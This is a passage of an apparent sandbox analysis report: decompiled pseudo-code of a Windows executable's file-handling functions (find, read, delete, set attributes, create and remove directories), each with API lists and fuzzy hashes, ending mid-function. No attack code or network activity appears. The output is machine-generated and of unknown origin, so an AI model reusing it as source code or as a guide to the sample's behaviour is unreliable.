                              				_t11 = E0040553A(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
                              				E0040551A(_t22 - 0x10);
                              				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
                              				return _t11;
                              			}






                              APIs
                              • __EH_prolog.LIBCMT ref: 0040580B
                                • Part of subcall function 0040553A: FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirstH_prolog
                              • String ID:
                              • API String ID: 889498515-0
                              • Opcode ID: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                              • Instruction ID: 15a52a3ac40e1f9f01e416ae3406c700f8aec04b6379e90cb97043f6baa550c5
                              • Opcode Fuzzy Hash: bc6002362a3e3570d7b7dbbff413248cb0e6e96336b5f812f3c621cb83c14948
                              • Instruction Fuzzy Hash: 2AE01AB195150AAACB04DB50CC52AEEB760EB1131CF00421AA421722D0877856488A28
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E0040F8C3(intOrPtr* __ecx, void* __eflags) {
                              				void* _t8;
                              				void* _t17;
                              				intOrPtr _t19;
                              
                              				E00413954(E0041A808, _t17);
                              				_push(__ecx);
                              				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
                              				 *((intOrPtr*)(_t17 - 0x10)) = _t19;
                              				_t8 = E0040F648(__ecx, __eflags,  *((intOrPtr*)(_t17 + 8))); // executed
                              				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
                              				return _t8;
                              			}







                              APIs
                              • __EH_prolog.LIBCMT ref: 0040F8C8
                                • Part of subcall function 0040F648: __EH_prolog.LIBCMT ref: 0040F64D
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                              • Instruction ID: 6b40bdca6a02cd8c303c1b1c800ac92429027f894e9b325ac65d5e69f4ab0667
                              • Opcode Fuzzy Hash: fd9f4e5796ff426001010c6032b0bd2709108ec26b7ef45d9eef3846ac2bdd07
                              • Instruction Fuzzy Hash: 0CD01272911104EBD711AB49D842BDEBB68EB8135DF10853BF00171550C37D56459569
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00405B7B(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
                              				long _v8;
                              				signed int _t11;
                              
                              				_push(__ecx);
                              				_v8 = _v8 & 0x00000000;
                              				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
                              				 *_a12 = _v8;
                              				return _t11 & 0xffffff00 | _t11 != 0x00000000;
                              			}






                              APIs
                              • ReadFile.KERNELBASE(000000FF,00000000,?,?,00000000,000000FF,?,00405BC6,00000000,?,00000000,?,00405BEC,00000000,?,00000000), ref: 00405B91
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                              • Instruction ID: c5e24743f6b433bb21cc94cc2971fe47eb8403274bd7f90fdb54931116458873
                              • Opcode Fuzzy Hash: a0fa365660526cfbb9cae47ffd537a5a3e67cffdb1018a760807b9850e2f108c
                              • Instruction Fuzzy Hash: 7EE0EC75241208FBCB01CF90CD01FCE7BB9EB49754F208058E90596160D375AA14EB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040551A(void** __ecx) {
                              				void* _t1;
                              				int _t3;
                              				signed int* _t6;
                              
                              				_t6 = __ecx;
                              				_t1 =  *__ecx;
                              				if(_t1 == 0xffffffff) {
                              					L4:
                              					return 1;
                              				} else {
                              					_t3 = FindClose(_t1); // executed
                              					if(_t3 != 0) {
                              						 *_t6 =  *_t6 | 0xffffffff;
                              						goto L4;
                              					} else {
                              						return 0;
                              					}
                              				}
                              			}







                              APIs
                              • FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CloseFind
                              • String ID:
                              • API String ID: 1863332320-0
                              • Opcode ID: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                              • Instruction ID: 986561ebb0227da743eeb2b9ec995cdcc659c9848a972ac8d271436d9e92df52
                              • Opcode Fuzzy Hash: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                              • Instruction Fuzzy Hash: 6BD0123150452166CF745E3C7C459C333D99A123B03660BAAF4B4D32E5D3748CC35AD4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00405A63(void** __ecx) {
                              				void* _t1;
                              				int _t3;
                              				signed int* _t6;
                              
                              				_t6 = __ecx;
                              				_t1 =  *__ecx;
                              				if(_t1 == 0xffffffff) {
                              					L4:
                              					return 1;
                              				} else {
                              					_t3 = FindCloseChangeNotification(_t1); // executed
                              					if(_t3 != 0) {
                              						 *_t6 =  *_t6 | 0xffffffff;
                              						goto L4;
                              					} else {
                              						return 0;
                              					}
                              				}
                              			}







                              APIs
                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00405A2C,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A6E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                              • Instruction ID: 8a38a6d9813b312501c47e0c29c9a2f8cf12ac5fa7676fc4773f80372e0f1af5
                              • Opcode Fuzzy Hash: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                              • Instruction Fuzzy Hash: 5CD0C93160462146CA645E3C7C849D737D89A16330325176AF0B5D22E4D3748D875E94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00404BDC(CHAR* __ecx, void* __eflags) {
                              				void* _t3;
                              				signed int _t4;
                              
                              				_t3 = E0040489C(__ecx, 0);
                              				if(_t3 != 0) {
                              					_t4 = DeleteFileA(__ecx); // executed
                              					return _t4 & 0xffffff00 | _t4 != 0x00000000;
                              				} else {
                              					return _t3;
                              				}
                              			}






                              APIs
                                • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              • DeleteFileA.KERNELBASE(?,?,00404DBF,?,00000000,?,?,?,?,?,00000000), ref: 00404BED
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: File$AttributesDelete
                              • String ID:
                              • API String ID: 2910425767-0
                              • Opcode ID: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                              • Instruction ID: 9a45e8f854b003a178289988cc7fc064ae5902da4cc88310474d582750e90668
                              • Opcode Fuzzy Hash: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                              • Instruction Fuzzy Hash: 0BC08C26209231439A043ABA3805ACB171E0EC122030AC0BBB800A2059CB288DC221DC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E00405C5A(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
                              				signed int _t4;
                              
                              				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
                              				asm("sbb eax, eax");
                              				return  ~( ~_t4);
                              			}





                              APIs
                              • SetFileTime.KERNELBASE(?,?,?,?,00405C84,00000000,00000000,?,00402E12,?), ref: 00405C68
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileTime
                              • String ID:
                              • API String ID: 1425588814-0
                              • Opcode ID: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                              • Instruction ID: 87fe90df0bd66b56430cb58ce5188ab21e49bedd0782b4bf3c7b48ca6ef22eff
                              • Opcode Fuzzy Hash: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                              • Instruction Fuzzy Hash: 8EC04C36158105FF8F020F70CC04C5EBFA2EB99711F10C918B269C40B0C7328024EB02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040489C(CHAR* __ecx, long __edx) {
                              				signed int _t3;
                              
                              				_t3 = SetFileAttributesA(__ecx, __edx); // executed
                              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                              			}





                              APIs
                              • SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                              • Instruction ID: c0231da6564a4fbd22ddd4f059f5cfeb57e5ba4ab4dd36146b68eeddd1056acd
                              • Opcode Fuzzy Hash: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                              • Instruction Fuzzy Hash: 5BA002A03112059BA6145B315E0AB6F296DEDC9AE1705C56C7412C5060EB29C9505565
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040498D(CHAR* __ecx) {
                              				signed int _t3;
                              
                              				_t3 = CreateDirectoryA(__ecx, 0); // executed
                              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                              			}





                              APIs
                              • CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CreateDirectory
                              • String ID:
                              • API String ID: 4241100979-0
                              • Opcode ID: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                              • Instruction ID: 18df801fa9cda183c38834b8287032c54ef98b8f5de1dc60049a64e9909c76fe
                              • Opcode Fuzzy Hash: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                              • Instruction Fuzzy Hash: DCA0223030030283E2200F320E0AB0F280CAF08AC0F00C02C3000C80E0FB28C000008C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004048AA(CHAR* __ecx) {
                              				signed int _t3;
                              
                              				_t3 = RemoveDirectoryA(__ecx); // executed
                              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                              			}





                              APIs
                              • RemoveDirectoryA.KERNELBASE(?,00404D27,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 004048AB
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: DirectoryRemove
                              • String ID:
                              • API String ID: 597925465-0
                              • Opcode ID: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                              • Instruction ID: 8a2519b774f471bade5b05e48f192836a719b77eeaa2736f11b150acbb720719
                              • Opcode Fuzzy Hash: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                              • Instruction Fuzzy Hash: E7A002603112058796241B315F0968F295D9D455D1706C5696516C4060DB29C5505555
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E00418320(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                              				intOrPtr* _t4;
                              				intOrPtr* _t7;
                              				_Unknown_base(*)()* _t11;
                              				void* _t14;
                              				struct HINSTANCE__* _t15;
                              				void* _t17;
                              
                              				_t14 = 0;
                              				_t17 =  *0x423514 - _t14; // 0x0
                              				if(_t17 != 0) {
                              					L4:
                              					_t4 =  *0x423518; // 0x0
                              					if(_t4 != 0) {
                              						_t14 =  *_t4();
                              						if(_t14 != 0) {
                              							_t7 =  *0x42351c; // 0x0
                              							if(_t7 != 0) {
                              								_t14 =  *_t7(_t14);
                              							}
                              						}
                              					}
                              					return  *0x423514(_t14, _a4, _a8, _a12);
                              				}
                              				_t15 = LoadLibraryA("user32.dll");
                              				if(_t15 == 0) {
                              					L10:
                              					return 0;
                              				}
                              				_t11 = GetProcAddress(_t15, "MessageBoxA");
                              				 *0x423514 = _t11;
                              				if(_t11 == 0) {
                              					goto L10;
                              				} else {
                              					 *0x423518 = GetProcAddress(_t15, "GetActiveWindow");
                              					 *0x42351c = GetProcAddress(_t15, "GetLastActivePopup");
                              					goto L4;
                              				}
                              			}










                              APIs
                              • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0041795A,?,Microsoft Visual C++ Runtime Library,00012010,?,0041BD2C,?,0041BD7C,?,?,?,Runtime Error!Program: ), ref: 00418332
                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041834A
                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041835B
                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00418368
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                              • API String ID: 2238633743-4044615076
                              • Opcode ID: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                              • Instruction ID: e87ed1bb16eb8be6f8b96595097180185a60ce52c98033cfd4ddfb8cddd90555
                              • Opcode Fuzzy Hash: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                              • Instruction Fuzzy Hash: C50179713002057F87209FB59C80A9B7AF4EB44B45318003EB558C3251DB6DCFC29BE9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 99%
                              			E0040E5A5(intOrPtr __ecx, signed int __edx) {
                              				signed int _t133;
                              				intOrPtr _t135;
                              				signed int _t136;
                              				signed int _t137;
                              				signed int _t148;
                              				intOrPtr _t159;
                              				signed int _t160;
                              				intOrPtr _t162;
                              				void* _t164;
                              				signed int _t167;
                              				intOrPtr _t175;
                              				signed int _t177;
                              				signed int _t183;
                              				intOrPtr _t184;
                              				intOrPtr _t185;
                              				intOrPtr _t201;
                              				signed int _t211;
                              				signed int _t214;
                              				signed int _t215;
                              				intOrPtr _t217;
                              				signed int _t218;
                              				void* _t219;
                              				void* _t220;
                              				void* _t221;
                              				signed int _t223;
                              				signed int _t225;
                              				void* _t226;
                              
                              				_t211 = __edx;
                              				E00413954(E0041A690, _t226);
                              				_t175 = __ecx;
                              				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
                              				E004042D6();
                              				_t223 =  *(_t226 + 8);
                              				E00404327( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
                              				while(1) {
                              					_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              					_t183 = _t211;
                              					 *(_t226 - 0x1c) = _t133;
                              					 *(_t226 - 0x18) = _t183;
                              					if(_t133 != 0xd) {
                              						goto L6;
                              					}
                              					L2:
                              					_t211 = 0;
                              					if(_t183 != 0) {
                              						L7:
                              						__eflags = _t133 - 0xa;
                              						if(_t133 != 0xa) {
                              							L9:
                              							__eflags = _t133 - 9;
                              							if(_t133 != 9) {
                              								L11:
                              								__eflags = _t133 | _t183;
                              								if((_t133 | _t183) == 0) {
                              									L13:
                              									_t135 =  *((intOrPtr*)(_t226 + 0xc));
                              									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
                              									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
                              										L17:
                              										_t184 =  *((intOrPtr*)(_t226 + 0xc));
                              										_t214 = 0;
                              										 *(_t226 - 0x10) = 0;
                              										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
                              										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
                              											L27:
                              											__eflags =  *(_t226 - 0x1c) - 9;
                              											if( *(_t226 - 0x1c) == 9) {
                              												__eflags =  *(_t226 - 0x18) - _t211;
                              												if( *(_t226 - 0x18) == _t211) {
                              													_t160 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              													_t184 =  *((intOrPtr*)(_t226 + 0xc));
                              													 *(_t226 - 0x18) = _t211;
                              													 *(_t226 - 0x1c) = _t160;
                              													_t211 = 0;
                              													__eflags = 0;
                              												}
                              											}
                              											_t215 =  *(_t223 + 8);
                              											 *(_t226 - 0x10) = _t211;
                              											__eflags = _t215 - _t211;
                              											 *(_t226 + 8) = _t211;
                              											if(_t215 <= _t211) {
                              												L37:
                              												_t136 =  *(_t226 - 0x1c);
                              												__eflags = _t136 - 0xa;
                              												if(_t136 != 0xa) {
                              													L48:
                              													_t137 = _t136 |  *(_t226 - 0x18);
                              													__eflags = _t137;
                              													if(_t137 == 0) {
                              														_t185 =  *((intOrPtr*)(_t226 + 0x14));
                              														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
                              														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
                              															L54:
                              															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
                              															return _t137;
                              														}
                              														E0040D9F9(_t185,  *(_t226 + 8));
                              														_t137 = E004042D6();
                              														_t225 =  *(_t226 + 8);
                              														__eflags = _t225;
                              														if(_t225 <= 0) {
                              															goto L54;
                              														} else {
                              															goto L53;
                              														}
                              														do {
                              															L53:
                              															_t137 = E004039DF( *((intOrPtr*)(_t226 + 0x18)), 0);
                              															_t225 = _t225 - 1;
                              															__eflags = _t225;
                              														} while (_t225 != 0);
                              														goto L54;
                              													}
                              													E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              													L50:
                              													 *(_t226 - 0x1c) = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                              													 *(_t226 - 0x18) = _t211;
                              													goto L36;
                              												}
                              												__eflags =  *(_t226 - 0x18) - _t211;
                              												if(__eflags != 0) {
                              													goto L48;
                              												}
                              												 *(_t226 - 0x48) = _t211;
                              												 *(_t226 - 0x44) = _t211;
                              												 *(_t226 - 0x40) = _t211;
                              												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
                              												 *((intOrPtr*)(_t226 - 0x4c)) = 0x41b748;
                              												 *(_t226 - 4) = _t211;
                              												 *(_t226 - 0x34) = _t211;
                              												 *(_t226 - 0x30) = _t211;
                              												 *(_t226 - 0x2c) = _t211;
                              												 *((intOrPtr*)(_t226 - 0x28)) = 4;
                              												 *((intOrPtr*)(_t226 - 0x38)) = 0x41b684;
                              												 *(_t226 - 4) = 1;
                              												E0040E23F(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
                              												_t177 = 0;
                              												__eflags =  *(_t223 + 8);
                              												 *(_t226 + 0x10) = 0;
                              												if( *(_t223 + 8) <= 0) {
                              													L47:
                              													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
                              													E004042AD(_t226 - 0x38);
                              													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
                              													E004042AD(_t226 - 0x4c);
                              													_t175 =  *((intOrPtr*)(_t226 - 0x14));
                              													goto L50;
                              												} else {
                              													goto L40;
                              												}
                              												do {
                              													L40:
                              													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
                              													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
                              													__eflags = _t148 - 1;
                              													if(_t148 != 1) {
                              														L43:
                              														__eflags = _t148;
                              														if(_t148 <= 0) {
                              															goto L46;
                              														}
                              														_t218 = _t148;
                              														do {
                              															E0040C413( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
                              															E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
                              															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
                              															_t218 = _t218 - 1;
                              															__eflags = _t218;
                              														} while (_t218 != 0);
                              														goto L46;
                              													}
                              													__eflags =  *((char*)(_t217 + 0x54));
                              													if( *((char*)(_t217 + 0x54)) == 0) {
                              														goto L43;
                              													}
                              													E0040C413( *((intOrPtr*)(_t226 + 0x14)), _t148);
                              													E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
                              													L46:
                              													_t177 = _t177 + 1;
                              													__eflags = _t177 -  *(_t223 + 8);
                              												} while (_t177 <  *(_t223 + 8));
                              												goto L47;
                              											} else {
                              												 *(_t226 + 0x10) =  *(_t184 + 0xc);
                              												do {
                              													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
                              													__eflags = _t201 - 1;
                              													if(_t201 != 1) {
                              														L34:
                              														_t64 = _t226 - 0x10;
                              														 *_t64 =  *(_t226 - 0x10) + _t201;
                              														__eflags =  *_t64;
